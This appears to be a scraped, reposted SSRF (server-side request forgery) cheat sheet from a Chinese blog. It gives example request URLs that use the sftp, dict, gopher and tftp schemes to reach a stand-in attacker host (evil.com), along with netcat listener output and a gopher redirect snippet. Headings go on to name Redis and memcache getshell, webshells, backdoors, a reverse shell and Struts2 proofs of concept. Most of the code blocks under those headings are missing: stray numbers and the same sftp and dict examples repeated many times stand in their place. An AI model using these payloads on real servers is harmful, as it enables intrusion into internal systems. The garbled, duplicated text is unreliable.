欢迎光临
我们一直在努力

SSRF Tips

<

div>

SSRF PHP function

   
 file_get_contents() fsockopen() curl_exec() 

URL schema support

SFTP

     
 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

Dict

     
 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

gopher

            
 // http://0cx.cc/ssrf.php?url=http://evil.com/gopher.php <?php         header('Location: gopher://evil.com:12346/_HI%0AMultiline%0Atest'); ?>  evil.com:# nc -v -l 12346 Listening on [0.0.0.0] (family 0, port 12346) Connection from [192.168.0.10] port 12346 [tcp/*] accepted (family 2, sport 49398) HI Multiline test 

TFTP

      
 http://0cx.cc/ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET  evil.com:# nc -v -u -l 12346 Listening on [0.0.0.0] (family 0, port 12346) TESTUDPPACKEToctettsize0blksize512timeout6 

file

 file_get_contents() fsockopen() curl_exec() 

0

 file_get_contents() fsockopen() curl_exec() 

1

ldap

 file_get_contents() fsockopen() curl_exec() 

2

 file_get_contents() fsockopen() curl_exec() 

3

PHP-FPM

PHP-FPM universal SSRF bypass safe_mode/disabled_functions/o exploit

SSRF memcache Getshell

Generate serialize

 file_get_contents() fsockopen() curl_exec() 

4

 file_get_contents() fsockopen() curl_exec() 

5

Output

 file_get_contents() fsockopen() curl_exec() 

6

 file_get_contents() fsockopen() curl_exec() 

7

webshell.php

 file_get_contents() fsockopen() curl_exec() 

8

 file_get_contents() fsockopen() curl_exec() 

9

back.php

     

0

     

1

example Discuz

open the website

     

2

     

3

clear data

     

4

     

5

backdoor url

     

6

     

7

SSRF Redis Getshell

Generate serialize

     

8

     

9

Output

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

0

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

1

example Discuz

Open website

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

2

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

3

Backdoor website

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

4

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

5

FFmpeg

cat test.jpg

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

6

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

7

subfile

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

8

 http://0cx.cc/ssrf.php?url=sftp://evil.com:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) SSH-2.0-libssh2_1.4.2 

9

PostgreSQL

Exploit

     

0

     

1

MongoDB

Exploit

     

2

     

3

CouchDB

exploit

     

4

     

5

     

6

     

7

Attacker could also send requests from CouchDB server to intranet by using replication function

     

8

     

9

Jboss

Jbosss POC

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

0

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

1

写入shell

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

2

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

3

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

4

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

5

reverse shell

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

6

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

7

Weblogic

gopher.php

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

8

 http://0cx.cc/ssrf.php?dict://attacker:11111/  evil.com:$ nc -v -l 11111 Connection from [192.168.0.10] port 11111 [tcp/*] accepted (family 2, sport 36136) CLIENT libcurl 7.40.0 

9

vuln website

            

0

            

1

vps

            

2

            

3

Local File Read

            

4

            

5

Bool SSRF

Struts2-016 POC

            

6

            

7

SSRF Proxy

SSRF_Proxy

ssrfsocks

from:http://blog.safebuff.com/2016/07/03/SSRF-Tips/

未经允许不得转载:杂术馆 » SSRF Tips
分享到: 更多 (0)